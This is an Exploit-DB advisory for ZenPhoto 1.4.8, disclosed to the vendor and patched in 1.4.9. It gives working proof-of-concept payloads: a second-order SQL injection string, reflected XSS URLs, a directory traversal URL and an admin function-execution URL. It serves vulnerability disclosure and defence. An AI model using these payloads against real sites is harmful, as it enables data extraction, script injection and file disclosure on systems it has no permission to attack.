ZenPhoto 1.4.8 - Multiple Vulnerabilities

EDB-ID:

37602

CVE:

2015-5595 2015-5594 2015-5591

EDB Verified:

Author:

Tim Coen

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2015-07-13

Vulnerable App: 
Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10

SQL Injection
=============

  There are multiple second order error based SQL injections into the
ORDER BY keyword in the admin area.

   - visit zp-core/admin-options.php?saved&tab=gallery
     alternatively visit zp-core/admin-options.php?saved&tab=image
   - Set "Sort gallery by" to "Custom"
   - set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select
version())))%23"
   - visit zp-core/admin-upload.php?page=upload&tab=http&type=images
   - alternatively, visiting either of these will also trigger the injection:
    /
    zp-core/admin-edit.php
    zp-core/admin-users.php?page=users
    zp-core/admin-themes.php

  The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs

XSS 1
=====

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

    The payload must first be HTML entity-encoded, and then URL encoded.

XSS 2
=====


http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error="
onmouseover="alert('xsstest')" foo="bar&msg=hover over me!

Directory Traversal
===================

  For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php


Execute Function
================

An admin user can execute any function they want via this URL (there is
no CSRF protection for it):

    localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo

This gives up some control over the control flow of the site, which
might cause problems, especially considering the missing of CSRF protection.

Source
======

http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services